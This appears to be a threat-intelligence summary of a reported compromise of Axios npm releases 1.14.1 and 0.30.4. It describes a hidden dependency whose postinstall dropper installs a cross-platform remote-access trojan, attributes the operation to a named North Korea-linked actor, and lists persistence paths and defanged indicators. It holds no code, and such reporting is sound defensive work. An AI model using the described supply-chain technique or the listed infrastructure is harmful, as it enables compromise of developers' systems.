Malicious Axios npm releases 1.14.1 and 0.30.4 allegedly used a compromised maintainer account to add the hidden [email protected] dependency, causing npm install to execute a postinstall dropper. The excerpt attributes the operation to UNC1069, described as a financially motivated North Korea-nexus actor linked to BlueNoroff, and identifies SILKBELL as the dropper and WAVESHAPER.V2 as the cross-platform RAT. The infection chain delivered macOS, Windows, and Linux payloads from sfrclak[.]com:8000, with Windows persistence through %PROGRAMDATA%\system.bat and a Registry Run key, macOS ad-hoc code signing, and Linux deployment to /tmp/ld.py. The RAT supported command execution, additional payload deployment, filesystem reconnaissance, 60-second C2 beaconing, and cleanup steps that removed evidence of the postinstall chain. Infrastructure and account indicators included sfrclak[.]com, callnrwise[.]com, 142.11.206[.]73, ifstap[@]proton[.]me, and nrwise[@]proton[.]me.